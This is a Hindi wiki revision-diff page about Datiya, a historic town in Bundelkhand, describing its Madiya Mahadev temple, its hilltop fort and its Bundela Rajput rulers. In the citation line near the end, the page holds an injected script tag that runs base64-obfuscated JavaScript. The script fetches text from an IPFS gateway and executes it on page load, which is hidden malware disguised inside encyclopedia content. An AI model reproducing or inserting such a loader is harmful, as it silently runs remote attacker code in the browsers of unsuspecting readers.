Difference between revisions of "दतिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''दतिया''' बुंदेलखंड, मध्य प्रदेश का एक ऐतिहासिक स्...' के साथ नया पन्ना बनाया)
 
Line 3: Line 3:
 
*दंतवक्त्र का मंदिर दतिया का मुख्य मंदिर है। इसे लोग 'मड़िया महादेव का मंदिर' कहते हैं।
 
*दंतवक्त्र का मंदिर दतिया का मुख्य मंदिर है। इसे लोग 'मड़िया महादेव का मंदिर' कहते हैं।
 
*मड़िया महादेव का मंदिर एक पहाड़ी पर अवस्थित है।
 
*मड़िया महादेव का मंदिर एक पहाड़ी पर अवस्थित है।
*दतिया का प्राचीन दुर्ग, जो एक ऊँची पहाड़ी पर स्थित है, ओड़छा नरेश वीरसिंह देव बुंदेला (17वीं शती) का बनवाया हुआ कहा जाता है।
+
*दतिया का प्राचीन दुर्ग, जो एक ऊँची पहाड़ी पर स्थित है, [[ओरछा]] नरेश वीरसिंह देव बुंदेला (17वीं शती) का बनवाया हुआ कहा जाता है।
 
*किंवदंती है कि इस [[दुर्ग]] को बनवाने में आठ [[वर्ष]], दस [[मास]] और छब्बीस दिन लगे थे और बत्तीस लाख नब्बे हज़ार नौ सौ अस्सी [[रुपया|रुपये]] व्यय हुए थे।
 
*किंवदंती है कि इस [[दुर्ग]] को बनवाने में आठ [[वर्ष]], दस [[मास]] और छब्बीस दिन लगे थे और बत्तीस लाख नब्बे हज़ार नौ सौ अस्सी [[रुपया|रुपये]] व्यय हुए थे।
 
*दतिया में [[बुन्देला|बुंदेल]] [[राजपूत|राजपूतों]] की एक शाखा का राज्य आधुनिक समय तक रहा है।
 
*दतिया में [[बुन्देला|बुंदेल]] [[राजपूत|राजपूतों]] की एक शाखा का राज्य आधुनिक समय तक रहा है।

Revision as of 11:59, 14 May 2012

datiya buandelakhand, madhy pradesh ka ek aitihasik sthan hai. yah jhaansi se 16 mil ki doori par sthit hai. prachin kal mean datiya 'dantavaktr' ki rajadhani mani jati thi.

  • dantavaktr ka mandir datiya ka mukhy mandir hai. ise log 'm diya mahadev ka mandir' kahate haian.
  • m diya mahadev ka mandir ek paha di par avasthit hai.
  • datiya ka prachin durg, jo ek ooanchi paha di par sthit hai, orachha naresh virasianh dev buandela (17vian shati) ka banavaya hua kaha jata hai.
  • kianvadanti hai ki is durg ko banavane mean ath varsh, das mas aur chhabbis din lage the aur battis lakh nabbe hazar nau sau assi rupaye vyay hue the.
  • datiya mean buandel rajapootoan ki ek shakha ka rajy adhunik samay tak raha hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 424 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh